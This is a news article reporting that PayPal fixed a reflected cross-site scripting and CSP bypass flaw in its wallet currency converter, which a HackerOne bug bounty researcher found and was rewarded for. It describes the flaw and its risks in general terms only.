PayPal Fixed A Cross Site Scripting Vulnerability

PayPal has resolved a reflected cross-site scripting (XSS) vulnerability found in the currency converter feature of user wallets. 

First disclosed on February 19, 2020, by a bug bounty hunter who goes by the name “Cr33pb0y” on HackerOne, the vulnerability is described as a “reflected XSS and CSP bypass” issue. 

The bug was found in the currency converter feature of PayPal wallets on the PayPal web domain.

In a limited disclosure, published on February 10 — close to a year after the researcher reported the issue privately — PayPal said the bug existed in the currency conversion endpoint and was caused by a failure to properly sanitize user input. 

A weak URL parameter failed to clean up input which could allow threat actors to inject malicious JavaScript, HTML, or any other code “that the browser could execute,” according to the advisory. 

As a result, malicious payloads could trigger in the Document Object Model (DOM) of a browser page of a victim without their knowledge or consent. 

Typically, reflected XSS attacks reflect scripts from a web source to a browser and may only require a victim to click on a malicious link to trigger. Payloads may be used to steal cookies, session tokens, or account information, or could be used as a step in wider attacks. 

Following the bug bounty hunter’s disclosure, PayPal has now implemented additional validation checks and sanitizer controls to control user input in the currency exchange feature and wipe out the bug.

A CVE has not been assigned but the vulnerability has been categorized as medium-severity. The researcher was awarded $2,900 as a financial reward. 

Last year, HackerOne published a list of the most impactful and rewarded vulnerability types reported on the platform during 2020. XSS attacks, improper access control, information disclosure, and Server-Side Request Forgery (SSRF) vulnerabilities secured the top spots. 

Previous and related coverage

Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0